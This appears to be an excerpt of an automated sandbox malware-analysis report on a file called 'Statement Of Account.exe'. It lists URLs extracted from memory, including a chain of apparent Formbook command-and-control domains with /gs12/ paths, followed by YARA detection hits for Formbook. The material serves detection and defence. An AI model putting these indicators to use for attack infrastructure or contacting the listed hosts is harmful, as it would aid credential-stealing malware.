          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000009.00000002.2947771554.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000009.00000002.2945097297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2948147154.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1719884903.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Statement Of Account.exe, 00000000.00000002.1703144585.0000000003150000.00000004.00000800.00020000.00000000.sdmp, SdYCcXyq.exe, 0000000B.00000002.1741610690.0000000002CBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/www.b-a-s-e.net
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.net
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.net/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.net/gs12/www.zdryueva.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.netReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.com/gs12/www.otirugkyt.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.website
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.website/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.website/gs12/www.juniavilela.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.websiteReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goldenvistaservices.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goldenvistaservices.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goldenvistaservices.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/www.bodution.website
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyzReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.com/gs12/www.lolabeautystudios.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.com/gs12/www.novistashop.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com/gs12/www.kustomequipment.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.com/gs12/www.udin88b.us
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.com/gs12/www.nexelab.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.com/gs12/www.demandstudiosnews.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us/gs12/www.baansbliss.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.usReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.com/gs12/www.hjgd.xyz
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000009.00000000.1710227267.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2940190226.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img

          E-Banking Fraud

          Source: Yara match, file source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_772cc62d (author: unknown)
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
